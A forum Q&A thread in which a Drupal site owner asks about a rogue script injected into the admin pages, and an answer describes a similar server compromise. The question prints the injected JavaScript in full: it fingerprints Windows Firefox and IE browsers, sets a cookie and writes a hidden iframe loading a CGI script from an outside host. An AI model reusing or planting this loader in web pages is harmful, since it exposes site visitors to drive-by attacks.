Why is "103fm" script appearing on Drupal website? [duplicate]

Question

Possible Duplicate:
Weird Script Appearing In My Website's DOM

I just noticed a weird script running in my websites DOM. I am running DRUPAL. The script is http://www.103fm.net/release.js. I don't know where to begin looking to find this rogue script. My website is miloads.com and it only happens in the admin menus. The weird thing is the file doesn't exist on 103fm.net, but it actually loads the following script:

var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}

Answer 1

Similarly, our client's server was compromised last night, by IP Addresses in Romania, Czech Republic and Poland. These seemingly automated processes appear to inject a script tag at the top of the body tag. This script appears to generate a cookie on Windows machines running Firefox and IE. It then opens an iframe and runs a CGI script running on a site hosted in Russia.

Fortunately, the latest version of Firefox won't even load the script; IE however does.

Chrome (despite not being affected) won't even allow you to visit the page on which this has happened.

As all reports I can find of this have happened recently, it could very well be a software vunerability, rather than compromised passwords - what FTP server are you running (connect to the server with your FTP client, and the console should tell you). The server in question is running ProFTPd 1.3.1.

If the software is common, then the creators should be informed.